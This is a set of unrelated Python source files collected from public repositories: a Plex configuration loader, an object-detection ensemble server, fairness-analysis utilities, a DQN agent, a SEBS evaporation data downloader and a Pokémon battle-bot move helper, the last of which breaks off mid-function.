logger.info("")
util.separator("Tautulli Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Tautulli...")
logger.info("")
try:
library.Tautulli = Tautulli(self, {
"url": check_for_attribute(lib, "url", parent="tautulli", var_type="url", default=self.general["tautulli"]["url"], req_default=True, save=False),
"apikey": check_for_attribute(lib, "apikey", parent="tautulli", default=self.general["tautulli"]["apikey"], req_default=True, save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Tautulli Connection {'Failed' if library.Tautulli is None else 'Successful'}")
library.Webhooks = Webhooks(self, {"error_webhooks": library.error_webhooks}, library=library, notifiarr=self.NotifiarrFactory)
logger.info("")
self.libraries.append(library)
util.separator()
if len(self.libraries) > 0:
logger.info(f"{len(self.libraries)} Plex Library Connection{'s' if len(self.libraries) > 1 else ''} Successful")
else:
raise Failed("Plex Error: No Plex libraries were connected to")
util.separator()
if self.errors:
self.notify(self.errors)
except Exception as e:
self.notify(e)
raise
def notify(self, text, library=None, collection=None, critical=True):
for error in util.get_list(text, split=False):
self.Webhooks.error_hooks(error, library=library, collection=collection, critical=critical)
def get_html(self, url, headers=None, params=None):
return html.fromstring(self.get(url, headers=headers, params=params).content)
def get_json(self, url, json=None, headers=None, params=None):
return self.get(url, json=json, headers=headers, params=params).json()
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def get(self, url, json=None, headers=None, params=None):
return self.session.get(url, json=json, headers=headers, params=params)
def get_image_encoded(self, url):
return base64.b64encode(self.get(url).content).decode('utf-8')
def post_html(self, url, data=None, json=None, headers=None):
return html.fromstring(self.post(url, data=data, json=json, headers=headers).content)
def post_json(self, url, data=None, json=None, headers=None):
return self.post(url, data=data, json=json, headers=headers).json()
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def post(self, url, data=None, json=None, headers=None):
return self.session.post(url, data=data, json=json, headers=headers)
|
the-stack_106_13000
|
from ai_hub import inferServer, log
import json
import torch
import mmdet
from mmdet.apis import init_detector, inference_detector
import torch.nn as nn
import numpy as np
import cv2
import time
import os
from ensemble_boxes import *
exp_compositions = {
'cascade_s50_rfp': {
'config':
'/work/configs/tile_round2/cascade_s50_rfp_mstrain.py',
'checkpoint':
'/work/work_dirs/round2/swa_cascade_s50_rfp_mstrain_aug_v2/swa_model_12.pth'
},
'cascade_s50_rfpac': {
'config':
'/work/configs/tile_round2/cascade_s50_rfpac_mstrain.py',
'checkpoint':
'/work/work_dirs/round2/swa_cascade_s50_rfp_mstrain_acfpn/swa_model_12.pth'
}
}
exp = exp_compositions['cascade_s50_rfp']
config_file = exp['config']
checkpoint_file = exp['checkpoint']
e_exp = exp_compositions['cascade_s50_rfpac']
e_config_file = e_exp['config']
e_checkpoint_file = e_exp['checkpoint']
class MyServer(inferServer):
def __init__(self, model, e_model, using_pair=True):
super().__init__(model)
log.i('Init myserver now')
device_1 = torch.device("cuda:0")
device_2 = torch.device("cuda:1")
self.device_1 = device_1
self.device_2 = device_2
self.using_pair = using_pair
self.model = model.to(device_1)
self.model.eval()
self.e_model = e_model.to(device_2)
self.e_model.eval()
def pre_process(self, request):
#json process
start_time = time.time()
file = request.files['img']
file_t = request.files['img_t']
self.filename = file.filename
file_data = file.read()
img = cv2.imdecode(
np.frombuffer(file_data, np.uint8), cv2.IMREAD_COLOR)
end_time = time.time()
print('Preprocess time: {} seconds'.format(end_time - start_time))
return img
def pridect(self, data):
# remember here to fetch the first one
start_time = time.time()
predictions = inference_detector(model=self.model, img=data)[0]
e_predictions = inference_detector(model=self.e_model, img=data)[0]
end_time = time.time()
print('Inference time: {} seconds'.format(end_time - start_time))
ret = {
'img': data,
'predictions': predictions,
'e_predictions': e_predictions
}
return ret
def post_predictions(self, predictions, img_shape):
bboxes_list, scores_list, labels_list = [], [], []
for i, bboxes in enumerate(predictions):
if len(bboxes) > 0 and i != 0:
detect_label = i
for bbox in bboxes:
xmin, ymin, xmax, ymax, score = bbox.tolist()
xmin /= img_shape[1]
ymin /= img_shape[0]
xmax /= img_shape[1]
ymax /= img_shape[0]
bboxes_list.append([xmin, ymin, xmax, ymax])
scores_list.append(score)
labels_list.append(detect_label)
return bboxes_list, scores_list, labels_list
def ensemble(self,
predictions,
e_predictions,
img_shape,
method='weighted_boxes_fusion',
weights=[1.5, 1],
iou_thr=0.5,
skip_box_thr=0.0001,
sigma=0.1):
bboxes, scores, labels = self.post_predictions(predictions, img_shape)
e_bboxes, e_scores, e_labels = self.post_predictions(
e_predictions, img_shape)
bboxes_list = [bboxes, e_bboxes]
scores_list = [scores, e_scores]
labels_list = [labels, e_labels]
bboxes, scores, labels = eval(method)(
bboxes_list,
scores_list,
labels_list,
weights=weights,
iou_thr=iou_thr,
skip_box_thr=skip_box_thr)
return bboxes, scores, labels
def post_process(self, data):
predictions = data['predictions']
e_predictions = data['e_predictions']
img_shape = data['img'].shape[:2]
out = self.ensemble(predictions, e_predictions, img_shape)
predict_rslt = []
max_score = -1
score_thr = 0.3
for (box, score, label) in zip(*out):
xmin, ymin, xmax, ymax = box.tolist()
xmin, ymin, xmax, ymax = round(
float(xmin) * img_shape[1],
2), round(float(ymin) * img_shape[0],
2), round(float(xmax) * img_shape[1],
2), round(float(ymax) * img_shape[0], 2)
max_score = max(max_score, score)
if xmax - xmin < 3 or ymax - ymin < 3:
continue
dict_instance = dict()
dict_instance['name'] = self.filename
dict_instance['category'] = int(label)
dict_instance['score'] = round(float(score), 6)
dict_instance['bbox'] = [xmin, ymin, xmax, ymax]
predict_rslt.append(dict_instance)
if max_score < score_thr:
predict_rslt = []
return predict_rslt
def debug(self, filename):
start_time = time.time()
self.filename = filename
img = cv2.imread(filename)
end_time = time.time()
print('Preprocess time: {} seconds'.format(end_time - start_time))
data = self.pridect(img)
data = self.post_process(data)
return data
if __name__ == '__main__':
model = init_detector(
config=config_file, checkpoint=checkpoint_file, device='cpu')
e_model = init_detector(
config=e_config_file, checkpoint=e_checkpoint_file, device='cpu')
log.i('Init model success')
myserver = MyServer(model=model, e_model=e_model, using_pair=False)
# myserver.debug('test.jpg')
myserver.run(debuge=False)
|
the-stack_106_13001
|
'''
Back-end functions used throughout the library
'''
from importlib.util import find_spec
import numpy as np
import pandas as pd
from . import __preprocessing as prep
from .__validation import validate_X, ValidationError
from warnings import warn
def cb_round(series, base=5, sig_dec=0):
""" Returns the pandas series (or column) with values rounded per the
custom base value
Args:
series (pd.Series): data to be rounded
base (float): base value to which data should be rounded (may be
decimal)
sig_dec (int): number of significant decimals for the
custom-rounded value
"""
if not base >= 0.01:
err = (f"cannot round with base {base}." +
"cb_round designed for base >= 0.01.")
raise ValueError(err)
result = series.apply(lambda x: round(base * round(float(x)/base), sig_dec))
return result
def bootstrap_significance(a, b, func, alpha=0.05, n_samples=50, n_trials=100):
""" Applies bootstrapping to evaluate the statistical difference between
two samples. Returns True (significant) if the p-value is less than alpha
for at least P=1-alpha percent of trials.
Args:
a (array-like): statistical sample.
b (array-like): statistical sample for comparison.
func (function): any statistical test returning it's p-value as the
second member of a tuple.
alpha (float, optional): Maximum p-value indicating significance.
Defaults to 0.05.
n_samples (int, optional): Number of samples to use for each trial.
Defaults to 50.
n_trials (int, optional): Number of trials to run. Defaults to 100.
Returns:
bool: whether difference is statistically significant
"""
pvals = []
# Create a list of p-values for each of n_trials
for i in range( 0, n_trials):
pvals += [func(np.random.choice(a, size=n_samples, replace=True),
np.random.choice(b, size=n_samples, replace=True))[1]
]
# Calculate the proportion of trials for which p < alpha
pvals = [int(v <= alpha) for v in pvals]
result = bool(np.mean(pvals) >= (1-alpha))
return result
def feature_table(df):
''' Displays a table containing statistics on the features available in the
passed df
Args:
df (pandas df): dataframe containing MIMIC data for the tutorial
'''
print(f"\n This data subset has {df.shape[0]} total observations" +
f" and {df.shape[1]-2} input features \n")
feat_df = pd.DataFrame({'feature': df.columns.tolist()
}).query(
'feature not in ["ADMIT_ID", "length_of_stay"]')
feat_df['Raw Feature'] = feat_df['feature'].str.split("_").str[0]
count_df = feat_df.groupby('Raw Feature', as_index=False
)['feature'].count(
).rename(columns={
'feature': 'Category Count (Encoded Features).'})
return count_df
def format_errwarn(func):
""" Wraps a function returning some result with dictionaries for errors and
warnings, then formats those errors and warnings as grouped warnings.
Used for reporting functions to skip errors (and warnings) while
providing
Args:
func (function): any function returning a tuple of format:
(result, error_dictionary, warning_dictionary). Note that
dictionaries should be of form {<column or id>:<message>}
Returns:
function: the first member of the tuple returned by func
"""
def format_info(dict):
info_dict = {}
for colname, err_wrn in dict.items():
_ew = list(set(err_wrn)) if isinstance(err_wrn, list) else [err_wrn]
for m in _ew:
m = getattr(m, 'message') if 'message' in dir(m) else str(m)
if m in info_dict.keys():
info_dict[m].append(colname)
else:
info_dict[m] = [colname]
info_dict = {ew:list(set(c)) for ew, c in info_dict.items()}
return info_dict
def wrapper(*args, **kwargs):
res, errs, warns = func(*args, **kwargs)
if any(errs):
err_dict = format_info(errs)
for er, cols in err_dict.items():
warn(f"Error processing column(s) {cols}. {er}\n")
if any(warns):
warn_dict = format_info(warns)
for wr, cols in warn_dict.items():
warn(f"Possible error in column(s) {cols}. {wr}\n")
return res
return wrapper
def iterate_cohorts(func):
""" Runs the function for each cohort subset
Args:
func (function): the function to iterate
Returns:
cohort-iterated version of the output
"""
def prepend_cohort(df, new_ix):
idx = df.index.to_frame().rename(columns={0:'__index'})
for l, i in enumerate(new_ix):
idx.insert(l, i[0], i[1])
if '__index' in idx.columns:
idx.drop('__index', axis=1, inplace=True)
df.index = pd.MultiIndex.from_frame(idx)
return df
def subset(data, idxs):
if data is not None:
return data.loc[idxs,]
else:
return None
def wrapper(cohorts=None, **kwargs):
""" Iterates for each cohort subset
Args:
cohorts (array-like or dataframe, optional): Groups by which to
subset the data. Defaults to None.
Returns:
pandas DataFrame
"""
# Run preprocessing to facilitate subsetting
X = kwargs.pop('X', None)
y_true = kwargs.get('y_true', None)
y_pred = kwargs.get('y_pred', None)
y_prob = kwargs.get('y_prob', None)
prtc_attr = kwargs.get('prtc_attr', None)
X, prtc_attr, y_true, y_pred, y_prob = \
prep.standard_preprocess(X, prtc_attr, y_true, y_pred, y_prob)
#
if cohorts is not None:
#
validate_X(cohorts, name="cohorts", expected_len=X.shape[0])
cohorts = prep.prep_X(cohorts)
#
cix = cohorts.index
cols = cohorts.columns.tolist()
cgrp = cohorts.groupby(cols)
limit_alert(cgrp, "permutations of cohorts", 8)
#
results = []
for k in cgrp.groups.keys():
ixs = cix.astype('int64').isin(cgrp.groups[k])
yt = subset(y_true, ixs)
yh = subset(y_pred, ixs)
yp = subset(y_prob, ixs)
pa = subset(prtc_attr, ixs)
new_args = ['prtc_attr', 'y_true', 'y_pred', 'y_prob']
sub_args = {k:v for k, v in kwargs.items() if k not in new_args}
df = func(X=X.iloc[ixs, :], y_true=yt, y_pred=yh, y_prob=yp,
prtc_attr=pa, **sub_args)
vals = cgrp.get_group(k)[cols].head(1).values[0]
ix = [(c, vals[i]) for i, c in enumerate(cols)]
df = prepend_cohort(df, ix)
results.append(df)
output = pd.concat(results, axis=0)
return output
else:
return func(X=X, **kwargs)
return wrapper
def is_dictlike(obj):
dictlike = all([callable(getattr(obj, "keys", None)),
not hasattr(obj, "size")])
return dictlike
def limit_alert(items:list=None, item_name="", limit:int=100,
issue:str="This may slow processing time."):
""" Warns the user if there are too many items due to potentially slowed
processing time
"""
if any(items):
if len(items) > limit:
msg = f"More than {limit} {item_name} detected. {issue}"
warn(msg)
def validate_notebook_requirements():
""" Alerts the user if they're missing packages required to run extended
tutorial and example notebooks
"""
if find_spec('fairlearn') is None:
err = ("This notebook cannot be re-run witout Fairlearn, available " +
"via https://github.com/fairlearn/fairlearn. Please install " +
"Fairlearn to run this notebook.")
raise ValidationError(err)
else:
pass
|
the-stack_106_13002
|
import math
def trg(a,b):
a=int(a)
b=int(b)
c=math.sqrt(a**2+b**2)
a1=a/c
t1=math.acos(a1)
t1=t1*180/math.pi
t2=round(t1)
if t2>45:
t2=90-t2
print (t2)
trg(5,12)
|
the-stack_106_13003
|
#!/usr/bin/env python
from setuptools import setup, find_packages
with open("README.rst", "r") as f:
readme = f.read()
setup(
name="FireDanger",
version="0.0.1",
description="Calculation of indices for forest fire risk assessment in weather and climate data.",
long_description=readme,
long_description_content_type="text/x-rst",
author="Daniel Steinfeld",
author_email="[email protected]",
url="https://github.com/steidani/FireDanger",
project_urls={
"Bug Tracker": "https://github.com/steidani/FireDanger/issues",
},
packages=find_packages(exclude=("tests", "tests.*", "docs", "docs.*", "examples", "examples.*" )),
python_requires=">=3.6",
install_requires=open("requirements.txt").read().split(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Atmospheric Science",
],
keywords=["data", "science", "meteorology", "climate", "extreme weather", "forest fire", "wildfire"]
)
|
the-stack_106_13004
|
import numpy as np
import random
from collections import namedtuple, deque
from model import QNetwork
import torch
import torch.nn.functional as F
import torch.optim as optim
BUFFER_SIZE = int(1e5) # replay buffer size
BATCH_SIZE = 64 # minibatch size
GAMMA = 0.99 # discount factor
TAU = 1e-3 # for soft update of target parameters
LR = 5e-4 # learning rate
UPDATE_EVERY = 4 # how often to update the network
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, seed, device="cpu", use_double_dqn=False):
"""Initialize an Agent object.
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
seed (int): random seed
device (str): name of copute device, i.e. cpu or cuda:0
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(seed)
# Initialize copute device (cpu or gpu)
self.device = torch.device(device)
# Q-Network
self.qnetwork_local = QNetwork(state_size, action_size, seed).to(self.device)
self.qnetwork_target = QNetwork(state_size, action_size, seed).to(self.device)
self.optimizer = optim.Adam(self.qnetwork_local.parameters(), lr=LR)
# Replay memory
self.memory = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE, seed, self.device)
# Initialize time step (for updating every UPDATE_EVERY steps)
self.t_step = 0
if use_double_dqn:
self.qtargets_next = self.double_dqn_qtargets_next
else:
self.qtargets_next = self.dqn_qtargets_next
def step(self, state, action, reward, next_state, done):
# Save experience in replay memory
self.memory.add(state, action, reward, next_state, done)
# Learn every UPDATE_EVERY time steps.
self.t_step = (self.t_step + 1) % UPDATE_EVERY
if self.t_step == 0:
# If enough samples are available in memory, get random subset and learn
if len(self.memory) > BATCH_SIZE:
# Experience Replay: Break correlation between consequitive experience
# tuples by sampling them randomly out of order
experiences = self.memory.sample()
self.learn(experiences, GAMMA)
def act(self, state, eps=0.):
"""Returns actions for given state as per current policy.
Params
======
state (array_like): current state
eps (float): epsilon, for epsilon-greedy action selection
"""
state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)
self.qnetwork_local.eval()
with torch.no_grad():
action_values = self.qnetwork_local(state)
self.qnetwork_local.train()
# Epsilon-greedy action selection
if random.random() > eps:
return np.argmax(action_values.cpu().data.numpy())
else:
return random.choice(np.arange(self.action_size))
def dqn_qtargets_next(self, next_states):
return self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)
def double_dqn_qtargets_next(self, next_states):
next_actions = self.qnetwork_local(next_states).detach().argmax(1)
q_targets = self.qnetwork_target(next_states).detach()
return torch.gather(q_targets, 1, next_actions.unsqueeze(-1))
def learn(self, experiences, gamma):
"""Update value parameters using given batch of experience tuples.
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# Get max predicted Q values (for next states) from target model
Q_targets_next = self.qtargets_next(next_states)
# Compute Q targets for current states
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Get expected Q values from local model
Q_expected = self.qnetwork_local(states).gather(1, actions)
# Compute loss
loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# ------------------- update target network ------------------- #
self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Fixed Q-Targets: Breaks the correlation of learning target with
parameters we are changing (moving target)
Params
======
local_model (PyTorch model): weights will be copied from
target_model (PyTorch model): weights will be copied to
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed, device):
"""Initialize a ReplayBuffer object.
Params
======
action_size (int): dimension of each action
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
seed (int): random seed
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
self.device = device
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(self.device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(self.device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(self.device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(self.device)
dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(self.device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
|
the-stack_106_13005
|
# -*- coding: utf-8 -*-
"""
Authors: Tim Hessels and Gonzalo Espinoza
UNESCO-IHE 2016
Contact: [email protected]
[email protected]
Repository: https://github.com/wateraccounting/watools
Module: Collect/SEBS
Restrictions:
The data and this python file may not be distributed to others without
permission of the WA+ team due data restriction of the SEBS developers.
Description:
This script collects SEBS data from the UNESCO-IHE FTP server. The data has a
monthly temporal resolution and a spatial resolution of 0.01 degree. The
resulting tiff files are in the WGS84 projection.
The data is available between 2000-03-01 till 2015-12-31.
Example:
from watools.Collect import SEBS
SEBS.monthly(Dir='C:/Temp/', Startdate='2003-02-24', Enddate='2003-03-09',
latlim=[50,54], lonlim=[3,7])
"""
from __future__ import print_function
# General modules
import numpy as np
import os
import pandas as pd
from ftplib import FTP
import scipy.io as spio
# Water Accounting Modules
import watools.WebAccounts as WebAccounts
import watools.General.data_conversions as DC
def DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar):
"""
This scripts downloads SEBS ET data from the UNESCO-IHE ftp server.
The output files display the total ET in mm for a period of one month.
The name of the file corresponds to the first day of the month.
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
lonlim -- [ymin, ymax] (values must be between -90 and 90)
latlim -- [xmin, xmax] (values must be between -180 and 180)
"""
# Check the latitude and longitude and otherwise set lat or lon on greatest extent
if latlim[0] < -90 or latlim[1] > 90:
print('Latitude above 90N or below -90S is not possible. Value set to maximum')
latlim[0] = np.max(latlim[0], -90)
latlim[1] = np.min(latlim[1], 90)
if lonlim[0] < -180 or lonlim[1] > 180:
print('Longitude must be between 180E and 180W. Now value is set to maximum')
lonlim[0] = np.max(lonlim[0],-180)
lonlim[1] = np.min(lonlim[1],180)
# Check Startdate and Enddate
if not Startdate:
Startdate = pd.Timestamp('2000-01-01')
if not Enddate:
Enddate = pd.Timestamp('2017-06-30')
# Creates dates library
Dates = pd.date_range(Startdate, Enddate, freq = "MS")
# Create Waitbar
if Waitbar == 1:
import watools.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount = len(Dates)
amount = 0
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
# Define directory and create it if not exists
output_folder = os.path.join(Dir, 'Evaporation', 'SEBS', 'Monthly')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for Date in Dates:
# Define year and month
year = Date.year
month = Date.month
# Date as printed in filename
Filename_out= os.path.join(output_folder,'ETa_SEBS_mm-month-1_monthly_%s.%02s.%02s.tif' %(Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d')))
# Define end filename
Filename_in = os.path.join("ETm%d%02d.mat" %(year, month))
# Temporary filename for the downloaded global file
local_filename = os.path.join(output_folder, Filename_in)
# Download the data from FTP server if the file not exists
if not os.path.exists(Filename_out):
try:
Download_SEBS_from_WA_FTP(local_filename, Filename_in)
# Clip dataset
Clip_Dataset(local_filename, Filename_out, latlim, lonlim)
os.remove(local_filename)
except:
print("Was not able to download file with date %s" %Date)
# Adjust waitbar
if Waitbar == 1:
amount += 1
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
return
def Download_SEBS_from_WA_FTP(local_filename, Filename_in):
"""
This function retrieves SEBS data for a given date from the
ftp.wateraccounting.unesco-ihe.org server.
Restrictions:
The data and this python file may not be distributed to others without
permission of the WA+ team due data restriction of the SEBS developers.
Keyword arguments:
local_filename -- name of the temporary file which contains global SEBS data
Filename_in -- name of the end file with the monthly SEBS data
"""
# Collect account and FTP information
username, password = WebAccounts.Accounts(Type = 'FTP_WA')
ftpserver = "ftp.wateraccounting.unesco-ihe.org"
# Download data from FTP
ftp=FTP(ftpserver)
ftp.login(username,password)
directory="/WaterAccounting_Guest/SEBS/Global_land_ET_V1/"
ftp.cwd(directory)
lf = open(local_filename, "wb")
ftp.retrbinary("RETR " + Filename_in, lf.write)
lf.close()
return
def Clip_Dataset(local_filename, Filename_out, latlim, lonlim):
# Open Dataset
SEBS_Array = spio.loadmat(local_filename)['ETm']
# Define area
XID = [int(np.floor((180 + lonlim[0])/0.05)), int(np.ceil((180 + lonlim[1])/0.05))]
YID = [int(np.ceil((90 - latlim[1])/0.05)), int(np.floor((90 - latlim[0])/0.05))]
# Define Georeference
geo = tuple([-180 + 0.05*XID[0],0.05,0,90 - 0.05*YID[0],0,-0.05])
# Clip Array
SEBS_Array_clipped = SEBS_Array[YID[0]:YID[1], XID[0]:XID[1]] * 0.1
# Save tiff file
DC.Save_as_tiff(Filename_out, SEBS_Array_clipped, geo, "WGS84")
|
the-stack_106_13006
|
from random import randint, choice
from copy import deepcopy
from data.moves import Moves
from data.pokedex import Pokedex
from data.types import Types
blacklist = {'focuspunch','fakeout','snore','dreameater','lastresort','explosion','selfdestruct','synchronoise','belch','trumphcard','wringout'}
zmoves = {'fairiumz':'twinkletackle',
'groundiumz':'tectonicrage',
'flyiniumz':'supersonicskystrike',
'iciumz':'subzeroslammer',
'psychiumz':'shatteredpsyche',
'ghostiumz':'neverendingnightmare',
'firiumz':'infernooverdrive',
'wateriumz':'hydrovortex',
'buginiumz':'savagespinout',
'electriumz':'gigavolthavoc',
'dragoniumz':'devastatingdrake',
'steeliumz':'corkscrewcrash',
'rockiumz':'continentalcrush',
'normaliumz':'breakneckblitz',
'grassiumz':'bloomdoom',
'darkiniumz':'blackholeeclipse',
'fightiniumz':'alloutpummeling',
'poisoniumz':'aciddownpour',
'aloraichiumz':'stokedsparksurfer',
'marshadiumz':'soulstealing7starstrike',
'decidiumz':'sinisterarrowraid',
'snorliumz':'pulverizingpancake',
'primariumz':'oceanicoperetta',
'inciniumz':'maliciousmoonsault',
'tapuniumz':'guardianofalola',
'mewniumz':'genesissupernova',
'eeviumz':'extremeevoboost',
'pikaniumz':'catastropika',
'pikashuniumz':'10000000voltthunderbolt',
'kommoniumz':'clangoroussoulblaze',
'lunaliumz':'menacingmoonrazemaelstrom',
'lycaniumz':'splinteredstormshards',
'mimikiumz':'letssnuggleforever',
'solganiumz':'searingsunrazesmash',
'ultranecroziumz':'lightthatburnsthesky'
}
dynamaxmoves = {
"Flying": 'maxairstream',
"Dark": 'maxdarkness',
"Fire": 'maxflare',
"Bug": 'maxflutterby',
"Water": 'maxgeyser',
"Status": 'maxguard',
"Ice": 'maxhailstorm',
"Fighting": 'maxknuckle',
"Electric": 'maxlightning',
"Psychic": 'maxmindstorm',
"Poison": 'maxooze',
"Grass": 'maxovergrowth',
"Ghost": 'maxphantasm',
"Ground": 'maxquake',
"Rock": 'maxrockfall',
"Fairy": 'maxstarfall',
"Steel": 'maxsteelspike',
"Normal": 'maxstrike',
"Dragon": 'maxwyrmwind',
}
waterImmune = ['Dry Skin','Water Absorb','Storm Drain']
grassImmune = ['Sap Sipper']
fireImmune = ['Flash Fire']
groundImmune = ['Levitate']
def getUsableZmove(pokemon):
zcrystals = zmoves.keys()
if not pokemon.item in zcrystals: return None
zmovedata = deepcopy(Moves[zmoves[pokemon.item]])
if zmovedata['basePower'] == 1:
for move in pokemon.moves:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ('return', 'frustration'):
if move.startswith(var):
move = var
if Moves[move]['type'] == zmovedata['type']:
zmovedata['baseMove'] = move
if Moves[move]['category'] == 'Status':
zmovedata['basePower'] = 0
zmovedata['category'] = 'Status'
if 'zMoveBoost' in Moves[move]:
zmovedata['boosts'] = Moves[move]['zMoveBoost']
else:
zmovedata['basePower'] = Moves[move]['zMovePower']
# If no move matches this isn't a Z-Crystal we can use
if zmovedata['basePower'] == 1: return None
# Status Z-Moves are technically fine to use
return zmovedata
else:
# Only need this right here
def addBase(zmove, base):
zmove['baseMove'] = base
return zmove
# Only special Z-Moves like Sinister Arrow Raid has a base power so check if they're usable
if zmovedata['id'] == 'catastropika' and pokemon.species == 'Pikachu' and 'thunderbolt' in pokemon.moves: return addBase(zmovedata, 'thunderbolt')
if zmovedata['id'] == 'extremeevoboost' and pokemon.species == 'Eevee' and 'lastresort' in pokemon.moves: return addBase(zmovedata, 'lastresort')
if zmovedata['id'] == 'genesissupernova' and pokemon.species == 'Mew' and 'psychic' in pokemon.moves: return addBase(zmovedata, 'psychic')
if zmovedata['id'] == 'sinisterarrowraid' and pokemon.species == 'Deucideye' and 'spiritshackle' in pokemon.moves: return addBase(zmovedata, 'spiritshackle')
if zmovedata['id'] == 'stokedsparksurfer' and pokemon.species == 'Raichu-Alola' and 'thunderbolt' in pokemon.moves: return addBase(zmovedata, 'thunderbolt')
if zmovedata['id'] == 'pulverizingpancake' and pokemon.species == 'Snorlax' and 'gigaimpact' in pokemon.moves: return addBase(zmovedata, 'gigaaimpact')
if zmovedata['id'] == 'maliciousmoonsault' and pokemon.species == 'Incineroar' and 'darkestlariat' in pokemon.moves: return addBase(zmovedata, 'darklariat')
if zmovedata['id'] == 'oceanicoperetta' and pokemon.species == 'Primarina' and 'sparklingaria' in pokemon.moves: return addBase(zmovedata, 'sparklingaria')
if zmovedata['id'] == 'soulstealing7starstrike' and pokemon.species == 'Marshadow' and 'spectralthief' in pokemon.moves: return addBase(zmovedata, 'spectralthief')
if zmovedata['id'] == 'clangoroussoulblaze' and pokemon.species == 'Kommo-o' and 'clangingscales' in pokemon.moves: return addBase(zmovedata, 'clangingscales')
if zmovedata['id'] == 'lightthatburnsthesky' and pokemon.species == 'Necrozma-Ultra' and 'photongeyser' in pokemon.moves: return addBase(zmovedata, 'photongeyser')
if zmovedata['id'] == 'letssnuggleforever' and pokemon.species in ('Mimikyu', 'Mimikyu-Busted') and 'playrough' in pokemon.moves: return addBase(zmovedata, 'playrough')
if zmovedata['id'] == 'menacingmoonrazemaelstrom' and pokemon.species in ('Lunala', 'Necrozma-Dawn-Wings') and 'moongeistbeam' in pokemon.moves: return addBase(zmovedata, 'moongeistbeam')
if zmovedata['id'] == 'searingsunrazesmash' and pokemon.species in ('Lunala', 'Necrozma-Dusk-Mane') and 'sunsteelstrike' in pokemon.moves: return addBase(zmovedata, 'sunsteelstrike')
if zmovedata['id'] == 'splinteredstormshards' and pokemon.species in ('Lycanroc', 'Lycanroc-Midnight', 'Lycanroc-Dusk') and 'stoneedge' in pokemon.moves: return addBase(zmovedata, 'stoneedge')
if zmovedata['id'] == 'guardianofalola' and pokemon.species in ('Tapu Koko', 'Tapu Bulu', 'Tapu Fini', 'Tapu Lele') and 'naturesmadness' in pokemon.moves: return addBase(zmovedata, 'naturesmadness')
# Shouldn't ever get here, but just in case do an explicit return with a specific falsy value
return False
def getDynamaxMoves(pokemon, canDynamax=False):
if not pokemon.dynamaxed and not canDynamax:
return []
maxmoves = []
for move in pokemon.moves:
if 'hiddenpower' in move:
move = move[:-2] if not move == 'hiddenpower' else move
for var in ('return', 'frustration'):
if move.startswith(var):
move = var
baseMoveData = Moves[move]
maxmove = dynamaxmoves[baseMoveData['type']]
if baseMoveData['category'] == 'Status':
maxmove = dynamaxmoves['Status']
if pokemon.dynamaxed == 'gmax':
try:
gmaxmove = Pokedex[pokemon.species + '-Gmax']['gmaxMove']
if Moves[gmaxmove]['type'] == baseMoveData['type']:
maxmove = gmaxmove
except KeyError:
# If a Gmax doesn't have their Gmax move yet
pass
# Copy to not affect the data
maxmoveCopy = deepcopy(Moves[maxmove])
maxmoveCopy['baseMove'] = move
maxmoveCopy['category'] = baseMoveData['category']
if baseMoveData['category'] != 'Status':
try:
gmaxPower = baseMoveData['gmaxPower']
except KeyError:
# No gmax power set, calculate it
basePower = baseMoveData['basePower']
moveType = maxmoveCopy['type']
if not basePower:
gmaxPower = 100
if moveType in ('Fighting', 'Poison'):
if basePower >= 150:
gmaxPower = 100
elif basePower >= 110:
gmaxPower = 95
elif basePower >= 75:
gmaxPower = 90
elif basePower >= 65:
gmaxPower = 85
elif basePower >= 45:
